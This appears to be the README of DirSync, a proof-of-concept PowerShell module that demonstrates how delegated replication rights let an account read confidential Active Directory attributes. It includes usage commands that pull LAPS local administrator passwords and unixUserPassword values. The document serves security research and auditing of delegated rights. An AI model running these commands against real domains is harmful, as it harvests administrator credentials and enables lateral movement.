DirSync is a simple proof of concept PowerShell module to demonstrate the impact of delegating DS-Replication-Get-Changes
and DS-Replication-Get-Changes-In-Filtered-Set
.
DS-Replication-Get-Changes
allows to read the value of confidential attributes.DS-Replication-Get-Changes-In-Filtered-Set
, coupled withDS-Replication-Get-Changes
, allows to read the value of confidential and Read-Only Domain Controller (RODC) filtered attributes, such as Local Administrator Password Solution's (LAPS)ms-Mcs-AdmPwd
.
See technical details at https://simondotsh.com/infosec/2022/07/11/dirsync.html.
Import-Module .\DirSync.psm1
Uses the DirSync LDAP control to synchronize Legacy Microsoft LAPS' attribute ms-Mcs-AdmPwd
and Windows LAPS' msLAPS-Password
. Requires DS-Replication-Get-Changes
and DS-Replication-Get-Changes-In-Filtered-Set
.
Sync-LAPS
Sync-LAPS -Server dc.contoso.com -Username Administrator -Password Password1$ -Domain contoso.com
Sync-LAPS -LDAPFilter '(samaccountname=workstation01$)'
Synchronize the LAPS password of all computer accounts over LDAPS, and ignore certificate validation.
Sync-LAPS -UseLDAPS -IgnoreCert
Uses the DirSync LDAP control to synchronize any requested attribute(s), namely confidential and RODC filtered ones. Requires DS-Replication-Get-Changes-In-Filtered-Set
and/or DS-Replication-Get-Changes
depending on the attribute.
The usage is identical to Sync-LAPS
, except it requires-LDAPFilter
and -Attributes
.
Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword
Sync-Attributes -LDAPFilter '(samaccountname=unix_user)' -Attributes unixUserPassword,description
Thank you to @marcan2020 for his usual code reviews.
See the LICENSE
file for legal wording. Essentially it is MIT, meaning that I cannot be held responsible for whatever results from using this code, and do not offer any warranty. By agreeing to this, you are free to use and do anything you like with the code.